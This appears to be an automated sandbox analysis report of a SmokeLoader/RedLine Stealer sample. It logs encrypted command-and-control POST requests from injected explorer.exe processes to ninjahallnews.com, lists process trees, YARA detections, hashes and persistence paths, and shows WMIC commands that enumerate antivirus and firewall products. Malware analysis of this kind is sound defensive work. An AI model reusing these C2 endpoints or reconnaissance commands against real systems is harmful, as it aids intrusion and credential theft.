                                                                                                                          2024-10-08 16:24:39 UTC296OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 7a 34 01 83 b7 25 93 3c 70 f5 76 91 de f5 1e 15 e5 26 2e ac 72 e5 f0 14 6b e2 08 38 2f c6 ba 8c 73 e2 a7 41 4c e3 87 2f e5 25 31 ff fa 13 1d 31 6e 2c 5a 89 28 c0 93 c1 02 e6 ae 44 0b 1a 97 0e 14 ac 75 72 c2 fd bf b7 3d 28 a4 13 d2 6d f3 71 64 a5 53 cf 60 4b 68 17 5f bd dd 19 b7 85 66 80 39 04 e8 c0 8e 44 c2 8b 6d bf a7 8c bc 34 24 b4 8d 98 63 27 b8 1f 2b 98 2b 6e 2e b0 72 68 7f d2 02 36 44 d0 c4 c3 1e 77 c4 b6 02 fe 4b eb a9 c0 0f 6c 78 31 c9 42 72 4a 44 01 ca 50 ae cc 10 5c 79 51 20 df fd 63 24 11 07 8e ed fc 1c f8 df 05 f5 20 96 87 bd 86 16 af 58
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Lz4%<pv&.rk8/sAL/%11n,Z(Dur=(mqdS`Kh_f9Dm4$c'++n.rh6DwKlx1BrJDP\yQ c$ X
2024-10-08 16:24:39 UTC | 278 | IN | HTTP/1.1 200 OK
    Date: Tue, 08 Oct 2024 16:24:39 GMT
    Server: Apache/2.4.52 (Ubuntu)
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    Content-Length: 0
    Content-Type: text/html; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 61452 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:24:40 UTC | 287 | OUT | POST /search.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: https://oqtouvjrjhoopu.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 360
    Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:40 UTC360OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 7b 34 01 83 b7 25 93 3c 6e d9 76 e1 97 cd 54 39 d2 28 68 b2 4f ed cd 18 67 d8 74 48 44 be a0 eb 6e aa a9 0c 08 c2 ac 68 fa 50 39 95 9b 06 14 78 6e 10 51 db 2c 8a ce da 53 84 fc 22 06 05 aa 07 34 d4 32 1b c8 c6 e6 92 4a 65 ab 0d fb 5f bf 6e 5c a1 13 b3 38 26 44 77 77 a9 bd 06 ea af 1f e5 50 02 c3 dc 81 12 b3 f9 79 bc 8c 86 b7 0a 4c 8d 98 d7 64 52 d4 49 38 dd 1a 19 31 98 68 62 2f b2 36 61 01 e2 8d e4 1f 6e 98 c6 7a b9 79 e3 f0 c0 00 67 3d 54 c5 70 35 0c 3d 1e f5 39 ec c0 06 0a 09 41 45 91 eb 21 74 16 0d b3 d0 f2 4d d9 e2 3e ec 2c d8 b6 da b4 14 d5 5f
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@L{4%<nvT9(hOgtHDnhP9xnQ,S"42Je_n\8&DwwPyLdRI81hb/6anzyg=Tp5=9AE!tM>,_
2024-10-08 16:24:40 UTC | 278 | IN | HTTP/1.1 200 OK
    Date: Tue, 08 Oct 2024 16:24:40 GMT
    Server: Apache/2.4.52 (Ubuntu)
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    Content-Length: 0
    Content-Type: text/html; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 61454 | 23.145.40.168 | 443 | 3536 | C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:24:46 UTC | 286 | OUT | POST /search.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: https://ninjahallnews.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 501
    Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:46 UTC501OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 48 cf 15 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 6b 11 28 eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c ad ca 1e d8 3d 79 ef cf 8f 3a dd bf 5a 9c b9 91 a3 17 4e b1 d1 a2 74 0f ad 74 2f 89 29 43 37 e6 6e 70 7c c9 1f 37 0e f1 96 cf 21 5e a8 c9 4d c6 45 c6 c6 ce 3e 63 2c 6d c3 44 0a 0e 2f 1b cb 04 bf a6 0b 0f 18 7b 1c e6 83 50 7e 1d 32 cd cb ec 15 f9 f0 01 d5 78 ac b8 df 9a 5f 86 43
                                                                                                                          Data Ascii: ry`ie2a'C|G|nluIP g3@ZFLj4%<H*%Qg3FIvw]3-jGk(i".A9&FiVbT ?TKLu|=y:ZNtt/)C7np|7!^ME>c,mD/{P~2x_C
2024-10-08 16:24:47 UTC | 287 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 08 Oct 2024 16:24:47 GMT
    Server: Apache/2.4.52 (Ubuntu)
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    Content-Length: 409
    Content-Type: text/html; charset=utf-8
    Connection: close
                                                                                                                          2024-10-08 16:24:47 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 61463 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:26:00 UTC | 288 | OUT | POST /search.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: https://vufdhvyhyvwjjkm.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 109
    Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:26:00 UTC109OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[CLk4%<2eQvb%;=j ,
2024-10-08 16:26:01 UTC | 285 | IN | HTTP/1.1 404 Not Found
    Date: Tue, 08 Oct 2024 16:26:00 GMT
    Server: Apache/2.4.52 (Ubuntu)
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    Content-Length: 7
    Content-Type: text/html; charset=utf-8
    Connection: close
2024-10-08 16:26:01 UTC | 7 | IN | Data Raw: 03 00 00 00 1e 0d af
    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 61465 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:26:17 UTC | 285 | OUT | POST /search.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: https://cnafyhqaamox.net/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 109
  Host: ninjahallnews.com
2024-10-08 16:26:17 UTC | 109 | OUT | Data Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
  Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[CLk4%<2eQvb%;=j ,
2024-10-08 16:26:17 UTC | 285 | IN | HTTP/1.1 404 Not Found
  Date: Tue, 08 Oct 2024 16:26:17 GMT
  Server: Apache/2.4.52 (Ubuntu)
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  Content-Length: 7
  Content-Type: text/html; charset=utf-8
  Connection: close
2024-10-08 16:26:17 UTC | 7 | IN | Data Raw: 03 00 00 00 1e 0d af
  Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 61467 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:26:37 UTC | 289 | OUT | POST /search.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: https://vevyfytohbagkutf.net/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 109
  Host: ninjahallnews.com
2024-10-08 16:26:37 UTC | 109 | OUT | Data Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
  Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[CLk4%<2eQvb%;=j ,
2024-10-08 16:26:37 UTC | 285 | IN | HTTP/1.1 404 Not Found
  Date: Tue, 08 Oct 2024 16:26:37 GMT
  Server: Apache/2.4.52 (Ubuntu)
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  Content-Length: 7
  Content-Type: text/html; charset=utf-8
  Connection: close
2024-10-08 16:26:37 UTC | 7 | IN | Data Raw: 03 00 00 00 1e 0d af
  Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 61470 | 23.145.40.168 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 16:26:56 UTC | 287 | OUT | POST /search.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: https://slehgyiiuvhyal.org/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 109
  Host: ninjahallnews.com
2024-10-08 16:26:56 UTC | 109 | OUT | Data Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
  Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[CLk4%<2eQvb%;=j ,
2024-10-08 16:26:56 UTC | 285 | IN | HTTP/1.1 404 Not Found
  Date: Tue, 08 Oct 2024 16:26:56 GMT
  Server: Apache/2.4.52 (Ubuntu)
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  Content-Length: 7
  Content-Type: text/html; charset=utf-8
  Connection: close
2024-10-08 16:26:56 UTC | 7 | IN | Data Raw: 03 00 00 00 1e 0d af
  Data Ascii:


Target ID: 0
Start time: 12:22:56
Start date: 08/10/2024
Path: C:\Users\user\Desktop\O4zPA1oI9Y.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\O4zPA1oI9Y.exe"
Imagebase: 0x400000
File size: 223'744 bytes
MD5 hash: 2942CB9FCA04E939AF4ED1EEF717E123
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2233484367.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2233359138.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2233667706.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2233667706.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2233749509.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2233749509.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 2
Start time: 12:23:05
Start date: 08/10/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff609140000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 6
Start time: 12:23:24
Start date: 08/10/2024
Path: C:\Users\user\AppData\Roaming\jvgasii
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\jvgasii
Imagebase: 0x400000
File size: 223'744 bytes
MD5 hash: 2942CB9FCA04E939AF4ED1EEF717E123
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2516805210.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2517016123.00000000007DD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2516839505.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2516839505.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 79%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 9
Start time: 12:23:53
Start date: 08/10/2024
Path: C:\Users\user\AppData\Local\Temp\DE97.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\DE97.exe
Imagebase: 0x400000
File size: 229'376 bytes
MD5 hash: 1096F19319B5C475C2A12B8D0CC4022D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2777517126.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2777517126.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2777599585.00000000006D3000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.2777432655.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2777687762.00000000008D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2777687762.00000000008D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

Target ID: 10
Start time: 12:24:18
Start date: 08/10/2024
Path: C:\Users\user\AppData\Roaming\uegasii
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\uegasii
Imagebase: 0x400000
File size: 229'376 bytes
MD5 hash: 1096F19319B5C475C2A12B8D0CC4022D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.3040636907.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.3041248373.0000000000743000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.3041046973.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.3041046973.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

                                                                                                                          Target ID:11
                                                                                                                          Start time:12:24:36
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\8CAE.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\8CAE.exe
                                                                                                                          Imagebase:0x7ff7cbca0000
                                                                                                                          File size:78'336 bytes
                                                                                                                          MD5 hash:65AEAA0A0849CB3CE9BC15BCBF0B7B9F
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 42%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:12
                                                                                                                          Start time:12:24:37
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                          Imagebase:0x7ff6c8440000
                                                                                                                          File size:69'632 bytes
                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:13
                                                                                                                          Start time:12:24:39
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          Imagebase:0x5d0000
                                                                                                                          File size:4'514'184 bytes
                                                                                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:15
                                                                                                                          Start time:12:24:40
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\explorer.exe
                                                                                                                          Imagebase:0x7ff609140000
                                                                                                                          File size:5'141'208 bytes
                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:16
                                                                                                                          Start time:12:24:41
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          Imagebase:0x5d0000
                                                                                                                          File size:4'514'184 bytes
                                                                                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          Target ID:17
                                                                                                                          Start time:12:24:42
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\explorer.exe
                                                                                                                          Imagebase:0x7ff609140000
                                                                                                                          File size:5'141'208 bytes
                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000011.00000002.4578892665.00000000005C1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:18
                                                                                                                          Start time:12:24:43
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                          Imagebase:0x5d0000
                                                                                                                          File size:4'514'184 bytes
                                                                                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          Target ID:19
                                                                                                                          Start time:12:24:44
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\explorer.exe
                                                                                                                          Imagebase:0x7ff609140000
                                                                                                                          File size:5'141'208 bytes
                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:20
                                                                                                                          Start time:12:24:55
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:cmd
                                                                                                                          Imagebase:0x7ff7fc380000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:21
                                                                                                                          Start time:12:24:55
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:22
                                                                                                                          Start time:12:24:56
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:23
                                                                                                                          Start time:12:24:58
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
